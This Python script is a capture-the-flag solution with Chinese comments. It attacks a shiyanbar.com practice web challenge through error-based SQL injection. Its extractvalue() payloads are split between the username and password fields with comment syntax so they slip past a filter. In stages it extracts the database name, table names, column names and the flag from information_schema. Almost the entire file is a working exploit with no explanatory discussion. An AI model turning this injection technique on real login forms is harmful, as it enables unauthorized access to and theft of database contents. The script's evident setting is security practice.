# -*- coding:utf8 -*-
import requests
import re
def denglu(username,password):
# 设置代理,用于调试过程中抓包分析
proxies = {
"http": "http://localhost:9008",
"https": "http://localhost:9008",
}
# 组包
header = { "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36",
"Referer": "http://www.shiyanbar.com/ctf/2011",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1",
}
url='http://ctf5.shiyanbar.com/web/baocuo/index.php'
session = requests.session()
payload = {
'username':username,
'password':password
}
r = session.post(url, data=payload,headers = header).text
Set_Cookie = requests.utils.dict_from_cookiejar(session.cookies)
# 过滤有效信息,作为函数返回值
r = r.replace("<br>XPATH syntax error: ","")
r = r.replace("'","")
r = r.replace("\\","")
if "," in r:
tmp = re.split(",",r)
return tmp[0]
else:
return r
# 查询数据库名
database = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT database()))) or'")
print(database)
# 查询表名称
#table = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables where TABLE_SCHEMA REGEXP 'error_based_hpf'))) or'")
table = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables where TABLE_SCHEMA REGEXP '"+database+"'))) or'")
print(table)
# 查询字段名
#column = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT GROUP_CONCAT(column_name) from information_schema.KEY_COLUMN_USAGE where table_schema REGEXP database() and table_name REGEXP 'ffll44jj'))) or'")
column = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT GROUP_CONCAT(column_name) from information_schema.KEY_COLUMN_USAGE where table_schema REGEXP database() and table_name REGEXP '"+table+"'))) or'")
print(column)
# 找到flag
#result = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT value FROM ffll44jj))) or'")
result = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT "+column+" FROM "+table+"))) or'")
print(result)